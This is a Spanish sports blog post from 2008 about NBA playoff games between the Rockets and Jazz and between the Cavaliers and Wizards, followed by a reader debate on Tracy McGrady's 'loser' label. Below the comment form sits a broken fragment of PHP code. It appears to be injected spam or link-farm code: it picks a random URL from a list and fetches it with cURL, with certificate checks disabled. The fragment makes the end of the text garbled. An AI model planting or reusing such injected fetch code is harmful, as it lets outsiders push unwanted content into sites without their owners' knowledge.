T-Mac y su leyenda

22 de April de 2008 por Viva_Dirk

por Viva_Dirk y TheDeerHunter

La Leyenda Negra se ceba con los Rockets (UTA 90 – HOU 84)

Desde que Tomjanovich dijo aquella famosa frase de “nunca subestimes el corazón del campeón” Houston nunca ha ganado una serie tras perder el primer partido. Tampoco muchos equipos han logrado levantar un 0-2 en contra y en dos eliminatorias sucesivas los Rockets nunca han ido por delante de los Jazz en la media parte. Tampoco es buen presagio el hecho de que Utah sólo ha perdido 4 partidos en casa esta temporada y es difícil pensar que puedan levantar el vuelo precisamente en una plaza tan dura como Salt Lake.

McGrady nunca ha ganado una eliminatoria de playoffs. Suena tremendo decirlo, suena triste incluso insinuarlo, pero es un hecho que comienza a trascender lo que es cierto o no. Se está convirtiendo en leyenda… negra. T-Mac siempre recordará esta temporada como la que pudo ser y no fue. Con la boca pequeña se consideraba a Houston como uno de los posibles gallitos sólo un pequeño escalón por debajo de los favoritos, entonces pierden a Yao pero le echan narices infinitas y juego a raudales y al contrario de lo que todo el mundo pensaba, tan mermados, se mantienen en la pomada ganando incluso la ventaja campo en primera ronda. Pero el destino, no contento todavía, les depara la lesión de Rafer Alston, otro de los importantes de Adelman, precísamente ahora, contra Utah, donde Deron Williams puede sacarte la sangre desde la posición de base…

Lo de anoche es dramático. McGrady vs Su Leyenda. Durante 3 cuartos lucha a muerte contra su destino y parece que en esta ocasión puede salir bien parado. Líder en todas las categorías estadísticas de su equipo y disputando el partido. En el último período, como muchos esperaban, se hunde a lo más hondo del abismo y cae derrotado estrepitosamente metiendo un único y triste punto en mucho tiempo.

No sobreestimes el corazón de quien NO es un campeón. Más crueldad no puede haber. ¿Es posible que alguien se pueda levantar de un golpe así?

El Rey Lebron (WAS 86 – CLE 116)

Para este segundo partido las declaraciones llegaban del lado de los Cavs. Mike Brown dijo en la rueda de prensa posterior al primer encuentro que por momentos Lebron James habia parecido un jugador de fútbol americano por la cantidad y la dureza de los golpes que había recibido. El mismo Lebron declaró que es para lo que ha sido ‘creado’, que no media 2.05 y pesaba 115 kilos para tirar desde el perímetro y estaba dispuesto a ir en cada acción hacia la canasta y recibir los golpes que fueran necesarios.

Lebron cumplió su palabra y resultó imparable para los Wizards. Acabó el partido con 17 tiros libres lanzados y rozando el triple doble aunque debe mejorar mucho desde la linea de personal. James hizo un partido total, creó tiros fáciles para los exteriores y superioridades para los interiores (durante el primer cuarto incluso fue capaz de involucrar a Ben Wallace en el juego ofensivo de su equipo), contribuyó en el rebote, anotó y lo mas sorprendente, realizó una excelente defensa a cada uno de los que tuvo que defender, incluido Gilbert Arenas. A parte de James, en Cleveland el que funciona como ‘autónomo’ es Ilgauskas, es el que menos necesita a Lebron porque calidad le sobra. En 24 minutitos el lituano dejó 16 puntos y 9 rebotes con un gran acierto de cara al aro. Wally y Gibson aprovecharon perfectamente los espacios y entre ambos anotaron 28 puntos con una serie de 10 de 17 en tiros, mientras que Varejao buscaba cada resquicio bajo los aros en sus 20 minutos de juego.

Los Wizards no tuvieron contestación alguna y fueron barridos de la pista en todos los aspectos del juego. Arenas no está físicamente preparado para una serie como ésta y ayer la muñeca no le funcionó, Butler completó otro partido flojo, como el primero y Jamison lleva una temporada de esfuerzos a sus espaldas. El resto son poca cosa por si solos, pese a las mejoras de Haywood cerca del aro o al acierto de Songaila y Mason, y lo cierto es que los Wizards necesitan que todo funcione para poder pelear esta serie.

Si Cleveland consigue ganar algun partido en la capital, la eliminatoria estará vista para sentencia pero esperemos que por el bien del espectaculo, los Wizards nos sorprendan como han hecho durante todo el año.

Comenta

17 comentarios a esta entrada

  1. Olafur dice:
    #1

    Yo lo estuve viendo y la verdad es que fue un palo y de los gordos para los Rockets, cada vez que se acercaban y tenian opciones de llevarse el partido, llegaba un triple de Deron, de Okur, o coño hasta de Price para poner el partido en el congelador. Por no hablar del churro a una mano para matar el partido de Korver….

    T-Mac hizo un esfuerzo sobrehumano en todas las facetas y se quedo muerto en el ultimo cuarto, vamos que no se iba ni de Dueñas jojojoj

    Una pena que Scola y Battier estuvieran bastante desafortunados, con decir que ayer el segundo de a bordo fue Bobby Jackson que menudo cancer juas juas

    Ganar 2 partiditos en Utah seria casi como lo de las 22 victorias…pero estando T-Mac aun se puede soñar!

      Citar

  2. TheDeerHunter dice:
    #2

    A mí es que este tema me parece particularmente triste y cruel…
    La crueldad y subjetividad del término perdedor como en la película de Woody Allen sobre la pelota que bota sobre la red… y cae al otro extremo o se queda.

    He oído llamar perdedores a muchos. Baloncestísticamente hablando a gente de la talla de Gasol, Yao Ming, Webber por poner un par de ejemplos. También a otros con nombres mucho mayores: Pippen, Malone, Barkley, Stockton, Malone, Payton, Iverson… algunos incluídos en cualquier lista de mejores jugadores de todos los tiempos.

    En concreto, de McGrady se ha llegado a decir esto:
    http://www.marca.com/blogs/deportespuntocom/ (con todos mis respetos al maestro Trecet)
    Mentalmente incompetente. Suena duro.

    En mi opinión. Ningún jugador en las circunstancias actuales de los Houston podría lograr la victoria.
    Seguramente McGrady no pertenece al olimpo de los dioses del baloncesto. No sé si hace mejores a sus jugadores (aunque sólo el hecho de estar él en cancha les ofrezca más espacios) P
    ero anoche, como tantas y tantas otras, puso toda la carne en el asador y no lo logró… circunstancialmente no pudo lograrlo.
    A mí me parece muy desafortunado llamar perdedor a alguien así.

      Citar

  3. MagicJohnson32 dice:
    #3

    Lo cierto es que McGrady (los Rockets) no tienen ninguna opción llegando en la situación que llegan. Y es tremendamente injusto cargar contra él por no superar la primera ronda.

    En lo negativo, para mí la temporada de McGrady es más bien floja, por mucho que hayan acabado con el 4º balance y ganasen 22 partidos seguidos. Y, cuando año tras año sucede lo mismo con diferente envoltorio…

    Esperemos que llegue el día en que McGrady cuente con equipo suficiente como para llegar lejos y acabar con la leyenda.

    Sobre los Wizards, es una pena que lleguen en este estado. Necesitarían 10 días en un Spa y 20 días de training camp, jeje, y en cambio se encuentran con LeBron & Co.

      Citar

  4. TheDeerHunter dice:
    #4

    pero bueno… ellos estaban contentos ¿no??

      Citar

  5. TheDeerHunter dice:
    #5

    McGrady ha hecho una temporada similar a la de toda su carrera. 21,6ppp 5,1rebs 5,6asis 1,0rob (eficiencia según la pág oficial de +22)

    por poner un punto de referencia, Ginóbili que ha ganado hoy el premio a mejor 6º hombre: (ojo, que a mí el Narigón me encanta) 19,5ppp 4,8rebs 4,5asis 1,5rob en 5 minutos menos de juego. eficiencia según la pág oficial de +17)

    La diferencia es que el argentino ya tiene en su poder… 3 anillos y un título de 6º hombre.
    Bien podríamos pensar que McGrady podría hacerlo bien de 6º hombre en un equipo donde estuviera Tim Duncan.

    Insisto. Yo no creo que McGrady esté al nivel de los más grandes de la historia… pero no creo que sea un mal jugador ni mucho menos un perdedor o un incompetente.
    Sin McGrady. ¿alguien piensa que Houston hubiera conseguido el 4º puesto del Wild Wild West???

      Citar

  6. Gallis dice:
    #6

    A ver, yo creo que cuando se dice que un jugador tiene leyenda de perdedor, a estos niveles(lease Webber o T-Mac), eso no significa que sea un mal jugador…al contrario, creo que es una manera de “destacar” que lo único que les separa de los grandes, grandes, es un pasito. El más importante, pero solo un pasito…algunos acaban dandolo y otros no…y a ese nivel de perdedor llegan muy poquitos. Es más una etiqueta que una definición…

    En el caso de T-Mac, lo tuvo más cerca que nunca hace 2 ó 3 temporadas contra los Mavs, no lo recuerdo bien, cuando hizo todo lo humanamente posible y aún así, no lo consiguió…por supuesto que a cada temporada se le puede dar una explicación de porque no ha pasado nunca de primera ronda, pero es que esa palabra es muy fuerte…NUNCA. Puede ser cierto que T-Mac siempre se haya enfrentado a mejores equipos, pero vamos, que las sorpresas (equipos que se cargan a otros mejores que ellos) siempre las han dado otros…

    No me parece una caso perdido(aunque esta eliminatoria sí, la veo un 4-0), pero cada vez tengo menos fe en él…al menos sigue siendo maravilloso verle jugar…

    Y en la otra serie, la verdad es que los Wizards están tirando parte de la buena temporada que han hecho. Han ido a lo suyo, superando adversidad tras adversidad y jugando al baloncesto se ganan el quinto puesto del este y la simpatia de muchos…y de repente, se enzarzan en una polémica artificial, absurda, que no les aporta nada positivo, se olvidan de jugar a baloncesto y se meten en una pelea callejera con Lebron…quizá les hubiera venido mucho mejor que Arenas siguiera lesionado…puede que espabilen en Washington, pero creo que ya han perdido casi todas los posibilidades de sorprender a los Cavs…y encima han cabreado a Lebron…malamente lo veo….

      Citar

  7. MagicJohnson32 dice:
    #7

    No, ni de coña. Nadie ha dicho eso. Me encanta McGrady, siempre me ha encantado.

    Y aunque no lo digo por sus estadísticas, ahora que lo mencionas… ha metido 3 puntos menos, ha promediado menos rebotes, menos asistencias, menos robos y con porcentajes bajísimos en todas las categorías, tanto de 2 (42%), como triples (29%) y tiros libres (68%). Me parece una temporada bastante floja en el que los tramos brillantes han sido muy breves y han abundado más los grises (para lo que es él, que es un crack).

      Citar

  8. TheDeerHunter dice:
    #8

    Uff… No, Magic, me he expresado mal.

    No quería insinuar que tú hayas dicho que es un mal jugador.
    Simplemente he enlazado un comentario tuyo de lo flojo de su campaña (con el que sutilmente estoy de acuerdo) con sus estadísticas para demostrar más o menos la categoría de jugadores a la que pertenece (comparándolo un poco con el Narigón, vamos)

    En cualquier caso, yo no estoy tan seguro de que la étiqueta de “perdedor” sea simplemente eso y no vaya más allá (me refiero a comentarios como el de “mentalmente incompetente”)
    Yo creo que todos (yo el primero) en ocasiones damos demasiada importancia al hecho de ganar un anillo (que lo tiene) pero que la mayor parte de las veces depende más de factores externos al jugador que del jugador mismo.
    No sé… Jerry West, por ejemplo, que sí tiene un anillo pero yo creo que es el jugador que más finales ha perdido en la historia (contra los Celtics de los 11 consecutivos)

    Me sigue molestando mucho esa etiqueta para jugadores de estas características… para los del tipo de Deshawn Stevenson no tanto pero ¿McGrady??
    juer… es que ¿con qué equipos ha contado él y cuales han sido sus rivales???
    De todos modos, si no estoy confundido, él mismo dijo que era un loser el año pasado cuando palmó precísamente contra Houston.

    PD: Creo que cuando más cerca lo tuvo fue cuando estuvo a punto de ganar a los Pistons del último anillo. Cuando Prince comenzó a defenderle de forma magistral en el 4º partido ¿puede ser que en ese momento fueran 3-0 ganando

      Citar

  9. Olafur dice:
    #9

    Creo recordar que iban 3-1 arriba y remontaron Pistons con una defensa sublime de un mozalbete Prince por aquellos tiempos, pero vamos mejor no hablar de sus compañeros en aquella epoca jojojo.

      Citar

  10. Gallis dice:
    #10

    3-1, y no se le ocurrió otra cosa antes del quinto partido que decir que pensaba ya en segunda ronda…pero aquel año tenía una banda en Orlando…el año de los Mavs (2005) al que me refiero yo tenía un equipo mucho más serio y además, se pusieron 0-2 ganando los dos primeros en Dallas…y aún así perdieron ( y me juego la rodilla buena a que eso no ha pasado más de 4, como mucho 5 veces en toda la historia)…es decir, no creo que sea cuestión de ganar un anillo o no, jeje…

    Otra cosa son las “cosas” como las que dice Trecet, pero en eso ya no entro. yo me refiero a los comentarios habituales. Y para mí T-Mac si es un perdedor, probablemente mi perdedor favorito. Y desde luego no lo tomo como algo peyorativo. Ni se puede ganar siempre, ni pueden ganar todos…Yo es que no pierdo el tiempo con los Stevenson y compañia, jejejeje…

      Citar

  11. aro_pasado_no_newtoniano dice:
    #11

    Ser un perdedor, entendiendose por perdedor, el que suele que perder, tiene la ventaja que si algún día, por algún casual, revientas las gaunas, el Palace de Auburn Hills o lo que sea.

      Citar

  12. Viva_Dirk dice:
    #12

    En respuesta a una pregunta muy concreta que hace Deer, ¿con que compañeros contaba y que rivales tuvo? Todo depende de donde le pongas como jugador, desde luego si le pones a la altura de Ginobili bastante hizo, pero para los que durante años le han situado a la altura de Kobe, habrán tenido mas de una decepción.

    El año pasado es el caso mas grave, tenia a su lado a Yao que hizo 25-10, Battier que mas allá de los 10 puntos todos sabemos el tipo de jugador que es, pura intendencia y Alston era un base al menos decente aunque estuvo pésimo de cara al aro. Y su rival era Utah que no tenia a ningun aspirante al MVP como lo ha sido McGrady algun año.

    Ya digo, si a ese equipo le pones a Ginobili, pues es normal que pierdan, pero si le pones a Kobe, yo le exijo la victoria.

    Otro año es el que comenta Gallis, que habria sido una sorpresa si ganan a Dallas, pero después de ponerse 0-2, era el momento de dar el salto. La sorpresa siempre la han dado otros(que también lo ha dicho Gallis, jeje)

    Acabo diciendo que para mi McGrady ha sido un jugador bastante superior a Ginobili en sus años de plenitud, pero que no ha sido del nivel de Kobe por lo anteriormente comentado.

      Citar

  13. Olafur dice:
    #13

    Esta claro que alguno de esos 2 años deberían haber pasado pero tampoco hay que olvidar que en 2005, sus compañeros de quinteto eran Sura, Wesley, Yao y Padgett.

    El año pasado si que esperaba más pero tampoco se les podia considerar favoritos, ante un equipo con 4 jugadores nivel All-Star. Por no comentar de que hasta este año estaba el patán de Van Gundy

    Respecto a Kobe, ha demostrado más cierto(otra cosa es que me guste mas T-Mac), pero vamos que sin Shaq todavia no ha pasado de 1ª ronda jeje

      Citar

  14. Elio dice:
    #14

    A mi McGrady nunca me ha gustado especialmente… Pero desde que Houston cosechó un 0-2 en casa en 1994 y lo remontó para acabar ganando el anillo semanas después, desde que partiendo sexto en su conferencia ganó a los cuatro primeros en la liga en 1995 para acabar campeón y desde que enlazaron 22 victorias consecutivas en la liga mas competida en décadas… confiaré siempre en los Rockets.

      Citar

  15. MagicJohnson32 dice:
    #15

    No, si en los Rockets confiamos. En quien no confiamos es en McGrady 😀

    En serio, no tienen equipo suficiente pero cada verano pensamos que se han acabado las excusas, y al final siempre hay alguna excusa, y cuando no son las lesiones son Van Gundy y cuando no es otra cosa.

    ¿Cuándo acaba contrato T-Mac? ¿Aceptaría la midlevel para fichar por Lakers? jeje

      Citar

  16. Olafur dice:
    #16

    Juas juas mejor creo que responde el sólo, buenísimo: http://www.chron.com/disp/story.mpl/sports/bk/bkn/5725471.html

      Citar

  17. Gallis dice:
    #17

    Pues sí, muy gracioso, sobre todo lo de las cervezas, jojojojo…bueno, y la frase final es sublime. Joer, que fiche por LA y se le acabarán las penas, jajajaja…

    Pero vamos, es lo que hay y por muy gracioso sea (y por lo que se ve, está más cabreado que un mono, jojo), su historial en Playoffs es una enorme lista de excusas y/o decepciones.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>